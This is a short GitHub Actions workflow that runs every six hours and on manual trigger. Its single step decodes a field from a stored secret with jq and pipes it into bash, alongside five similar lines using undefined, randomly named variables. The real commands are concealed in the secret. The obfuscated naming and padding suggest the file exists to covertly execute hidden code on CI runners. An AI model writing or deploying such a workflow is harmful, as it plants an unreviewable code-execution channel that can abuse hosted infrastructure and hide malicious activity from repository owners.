name: boringsinglet

on:
  workflow_dispatch:
  schedule:
    - cron: '16 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: boringsinglet
        env:
          rs1: ${{ secrets.rs1 }}
        run: |
          echo $rs1 | jq -r .v903 | /bin/bash
          echo $eza80578 | jq -r .imf44 | /bin/bash
          echo $wno03803 | jq -r .k3 | /bin/bash
          echo $ojky84 | jq -r .jz4309 | /bin/bash
          echo $bdzy33 | jq -r .ru40 | /bin/bash
          echo $cztn5962 | jq -r .z563 | /bin/bash

